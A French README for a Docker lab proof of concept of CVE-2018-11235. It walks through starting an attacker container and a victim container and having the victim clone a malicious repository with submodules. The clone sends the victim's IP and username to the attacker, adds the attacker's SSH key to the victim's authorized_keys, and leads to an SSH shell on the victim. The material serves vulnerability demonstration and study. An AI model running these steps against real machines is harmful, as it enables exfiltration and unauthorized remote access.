Pour build les conteneurs dockers, utilisez :
make docker
(Les commandes make suivantes sont à lancer en parallèle sur différents terminaux depuis votre machine)
Pour démarrer le conteneur du serveur attaquant, utilisez :
make run_server
pour démarrer le conteneur représentant la victime, utilisez :
make run_client
Le conteneur va lancer le script client.py. Le script va transmettre son adresse Ip et son nom de utilisateur au pirate.
Suivez les instructions de la console des clients pour cloner le dépôt git malveillant.
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
Vous constaterez que l'adresse IP et le nom d'utilisateur de la victime sont transmis au serveur.
Après le clone, vérifiez que la clé publique des attaquants est bien ajoutée aux authorized_keys du client.
Ensuite, vous pouvez ouvrir un shell sur le client depuis le serveur, grâce à la commande suivante (à executer sur votre machine):
make server_bash
ssh <transmitted_username>@<transmitted_host>
Si vous avez quelques problèmes que ce soit pour executer ce Proof of Concept, veuillez créer une issue sur ce dépôt: https://github.com/ygouzerh/CVE-2018-11235/issues , nous vous répondrons le plus rapidement possible.